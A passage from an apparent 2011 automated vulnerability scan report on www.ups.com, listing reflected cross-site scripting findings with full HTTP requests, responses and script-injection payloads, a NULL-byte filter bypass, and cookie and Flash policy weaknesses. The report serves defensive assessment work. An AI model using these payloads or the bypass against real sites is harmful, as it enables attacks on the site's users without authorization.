<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d5/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
actionUrl = "/one-to-one/
...[SNIP]...

1.188. https://www.ups.com/uis/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 6b8b2%0ae3b2b84beb9 was submitted in the REST URL parameter 2. This input was echoed as 6b8b2
e3b2b84beb9
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uis/create6b8b2%0ae3b2b84beb9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42152


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uis/create6b8b2
e3b2b84beb9
?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create6b
...[SNIP]...

1.189. https://www.ups.com/uis/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e15"%20a%3db%2027a12099018 was submitted in the REST URL parameter 2. This input was echoed as b0e15" a=b 27a12099018 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/createb0e15"%20a%3db%2027a12099018 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42328


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis/createb0e15" a=b 27a12099018?appid=UIS">
...[SNIP]...

1.190. https://www.ups.com/uis/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1254a'%3bae2686a7b9a was submitted in the REST URL parameter 2. This input was echoed as 1254a';ae2686a7b9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uis/create1254a'%3bae2686a7b9a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
9a?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis/create1254a';ae2686a7b9a?appid=UIS';
actionUrl = "/one-to-one/login
...[SNIP]...

1.191. https://www.ups.com/uis/create [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001b991'-alert(1)-'d321cced5f0 was submitted in the loc parameter. This input was echoed as 1b991'-alert(1)-'d321cced5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /uis/create?loc=en_US%001b991'-alert(1)-'d321cced5f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10310


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
ed5f0&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_1b991'-alert(1)-'d321cced5f0&appid=UIS';
actionUrl = "/one-to-on
...[SNIP]...

1.192. https://www.ups.com/uis/create [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00796b6"><script>alert(1)</script>b4cf012dbf6 was submitted in the loc parameter. This input was echoed as 796b6"><script>alert(1)</script>b4cf012dbf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /uis/create?loc=en_US%00796b6"><script>alert(1)</script>b4cf012dbf6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10886


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_796b6"><script>alert(1)</script>b4cf012dbf6&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_796b6%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb4cf012dbf6%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.193. https://www.ups.com/uis/create [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /uis/create

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008760f</script><script>alert(1)</script>e6835d0adba was submitted in the loc parameter. This input was echoed as 8760f</script><script>alert(1)</script>e6835d0adba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /uis/create?loc=en_US%008760f</script><script>alert(1)</script>e6835d0adba&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10986


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f</script><script>alert(1)</script>e6835d0adba&appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8760f
...[SNIP]...

1.194. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>19907ea315a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

1.195. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9602c"><script>alert(1)</script>52a22fcaf15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

2. SSL cookie without secure flag set

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.ups.com
Path:   /upsemail/input

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /upsemail/input HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.upsemail.appSessionData=1rzXNYGJhy8lLHPvDNxHBJbyzlQG1DBZ1pNBKDB3W6vgQdDWNnbx!-2113502320!-1727859649!15501!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

3. Flash cross-domain policy
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://www.ups.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:14:30 GMT
Server: Apache
Last-Modified: Sun, 04 Jan 2009 01:10:32 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>

3.2. https://www.ups.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ups.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ups.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:16:36 GMT
Server: Apache
Last-Modified: Fri, 02 Jan 2009 19:31:03 GMT
Accept-Ranges: bytes
Content-Length: 104
Vary: User-Agent
Connection: close
Content-Type: text/xml


<cross-domain-policy>
   <allow-access-from domain="*.ups.com" secure="false"/>
</cross-domain-policy>

4. Cookie without HttpOnly flag set
There are 7 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ups.com
Path:   /pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=875ED31B0DEE37D8F173D692BBC68721; path=/
Set-Cookie: VignettePortal-NavTreeState-pressroom=""; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39265


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.2. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ups.com
Path:   /pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=C369137E4BDE9B000B785B657CCA7E92; path=/
Set-Cookie: VignettePortal-NavTreeState-pressroom=""; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38968


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.3. https://www.ups.com/upsemail/input

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.ups.com
Path:   /upsemail/input

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upsemail/input HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.upsemail.appSessionData=1rzXNYGJhy8lLHPvDNxHBJbyzlQG1DBZ1pNBKDB3W6vgQdDWNnbx!-2113502320!-1727859649!15501!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.4. http://www.ups.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes HTTP/1.1
Host: www.ups.com
Proxy-Connection: keep-alive
Referer: http://www.ups.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:15:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: defaultHome=us_en_home|1297646131685; domain=.ups.com; expires=Tuesday, 14-Feb-2012 01:15:31 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 124123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.5. http://www.ups.com/bussol

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bussol HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=CpLmNYGFLpNtpqTnvyFvXqLSv5TX0FZ3vFpMzNvC2T9yyBWp2R6w!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17812


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

4.6. http://www.ups.com/bussol/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bussol/ HTTP/1.1
Host: www.ups.com
